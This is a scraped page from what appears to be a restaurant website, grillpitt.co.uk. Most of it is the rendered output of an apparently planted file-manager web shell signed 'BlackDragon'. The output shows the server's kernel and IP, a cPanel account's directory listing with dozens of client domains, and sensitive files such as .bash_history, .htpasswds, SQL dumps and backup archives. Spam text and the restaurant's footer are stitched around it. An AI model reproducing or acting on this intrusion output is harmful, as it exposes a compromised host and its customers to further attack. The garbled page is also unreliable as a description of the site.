ਇੱਕ ਸਟਾਪ ਹੱਲ سان سڀني ڪاروبار سان ڪاروبار سان معاملو ڪندا آهيون grillpitt.co.uk
 Linux s200.servername.online 3.10.0-962.3.2.lve1.5.73.el7.x86_64 #1 SMP Wed Aug 24 21:31:23 UTC 2022 x86_64
 Apache
 194.146.104.10
 Cant read /etc/named.conf
Name Type Size Owner/Group Permission Last Modified Actions
. dir - 1810/1814 drwx--x--x 2023-11-29 06:45:05
.. dir - 0/99 drwxr-xr-x 2020-08-12 10:56:59
.cagefs dir - 1810/1814 drwxrwx--x 2020-08-12 10:56:59
.cl.selector dir - 1810/1814 drwxr-xr-x 2023-12-02 12:54:35
.cpaddons dir - 1810/1814 drwxr-xr-x 2020-08-12 10:43:46
.cpanel dir - 1810/1814 drwx------ 2023-12-10 07:03:49
.cphorde dir - 1810/1814 drwx------ 2023-09-27 12:50:16
.htpasswds dir - 1810/99 drwxr-x--- 2023-09-20 06:15:17
.pki dir - 1810/1814 drwxr----- 2020-08-12 10:56:20
.softaculous dir - 1810/1814 drwx--x--x 2020-12-10 05:13:59
.spamassassin dir - 1810/1814 drwx------ 2023-11-22 03:32:53
.subaccounts dir - 1810/1814 drwx------ 2021-05-25 11:15:59
.trash dir - 1810/1814 drwx------ 2023-12-10 12:54:43
.wp-toolkit dir - 1810/1814 drwx------ 2023-12-10 05:37:21
OSS1STOPSOLUTIONS.CO.UK dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
Thaikhun.co.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
access-logs link - 0/1814 drwxr-x--- 2023-12-09 09:06:22
allindetail.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
asalstarfoam.com.pk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
bmwlubricants.de dir - 1810/99 drwxr-x--- 2023-12-07 07:07:48
burgurgrill.com dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
chickenchoice.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
clickndrop.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
connectier.co.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
crm.oss1stop.com dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
crm.oss1stopsolutions.co.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
dtactix.ecom92.com dir - 1810/99 drwxr-x--- 2023-12-03 05:57:59
ecom92.com dir - 1810/99 drwxr-x--- 2023-12-08 09:57:37
etc dir - 1810/12 drwxr-x--- 2023-11-14 12:53:39
flamesoriginal.co.uk dir - 1810/99 drwxr-x--- 2023-12-06 06:26:52
getlickd.uk dir - 1810/99 drwxr-x--- 2023-12-06 11:48:10
grillpitt.co.uk dir - 1810/99 drwxr-x--- 2023-12-07 01:12:50
grillpitt.com dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
himalayangems.co.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
himalayanorganic.co.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
izrwellnesscenter.com dir - 1810/99 drwxr-x--- 2023-12-09 07:23:04
knowmeart.com dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
lamegos.co.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
logs dir - 1810/1814 drwx------ 2023-12-09 09:10:43
mail dir - 1810/1814 drwxr-x--x 2023-12-10 02:07:05
migration_files dir - 0/0 drwxr-xr-x 2023-05-11 11:54:40
nitroslushies.co.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
osm.media dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
oss1stop.co.uk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
oss1stop.com dir - 1810/1814 drwxr-xr-x 2023-11-29 07:06:25
platinumhotel.com.pk dir - 1810/99 drwxr-x--- 2023-12-07 07:09:30
public_html dir - 1810/99 drwxr-x--- 2023-11-06 12:35:19
rspvalets.co.uk dir - 1810/99 drwxr-x--- 2023-12-01 11:41:27
ryedshill.com dir - 1810/99 drwxr-x--- 2023-12-08 02:24:30
serenity.pk dir - 1810/99 drwxr-x--- 2023-12-07 07:18:59
socialbugs.uk dir - 1810/99 drwxr-x--- 2023-12-09 03:33:19
softaculous_backups dir - 1810/1814 drwx--x--x 2023-09-09 08:41:51
ssl dir - 1810/1814 drwxr-xr-x 2023-12-10 12:54:59
thetoolsstore.com.pk dir - 1810/99 drwxr-x--- 2023-11-29 07:06:25
tmp dir - 1810/1814 drwxr-xr-x 2023-12-08 09:11:52
vanjarify.shop dir - 1810/99 drwxr-x--- 2023-12-07 07:11:28
wordpress-backups dir - 1810/1814 drwx------ 2023-11-29 07:06:25
www link - 1810/99 drwxr-x--- 2023-11-06 12:35:19
.bash_history text/plain 664 B 1810/1814 -rw------- 2023-10-03 10:24:15
.bash_logout text/plain 18 B 1810/1814 -rw-r--r-- 2020-08-12 10:43:08
.bash_profile text/plain 193 B 1810/1814 -rw-r--r-- 2020-08-12 10:43:08
.bashrc text/plain 231 B 1810/1814 -rw-r--r-- 2020-08-12 10:43:08
.contactemail text/plain 29 B 1810/1814 -rw-r----- 2020-08-12 10:43:14
.lastlogin text/plain 625 B 1810/1814 -rw------- 2023-11-14 04:50:04
.myimunify_id text/plain 102 B 1810/1814 -rw-rw---- 2023-06-28 12:03:25
.spamassassinboxenable application/x-empty 0 B 1810/1814 -rw-r--r-- 2020-08-12 10:43:11
.spamassassinenable application/x-empty 0 B 1810/1814 -rw-r--r-- 2020-08-12 10:43:11
.viminfo text/plain 684 B 1810/1814 -rw------- 2021-01-13 12:23:29
.wp-toolkit-identifier text/plain 684 B 1810/1814 -rw------- 2021-01-15 07:23:42
0 text/plain 248.92 KB 1810/1814 -rw-r--r-- 2023-12-09 11:57:45
democustoms.ecom92.com.zip application/zip 432.89 MB 1810/1814 -rw-r--r-- 2023-08-04 11:53:12
dermox.com.pk.zip application/zip 328.53 MB 1810/1814 -rw-r--r-- 2023-05-12 06:18:51
dermox.com.pk2.zip application/zip 331.83 MB 1810/1814 -rw-r--r-- 2023-10-02 03:22:55
dtactix.ecom92.com.zip application/zip 332.71 MB 1810/1814 -rw-r--r-- 2023-10-03 07:29:37
ecom9381_vanjarifydb.sql text/plain 25.57 MB 1810/1814 -rw-r--r-- 2023-05-11 10:16:36
files.txt text/plain 3.85 KB 1810/1814 -rw-r--r-- 2023-09-30 07:26:46
himalyanorganic.ecom92.com.zip application/zip 555.36 MB 1810/1814 -rw-r--r-- 2023-06-03 01:40:34
vanjarify.shop.zip application/zip 163.39 MB 1810/1814 -rw-r--r-- 2023-06-14 10:23:21
© BlackDragon
Menu

“Food brings people together on many different levels. It’s nourishment of the soul and body; it’s truly love.”

Giada De Laurentiis

@GRILLPITTOFFICial

STAY

Tuned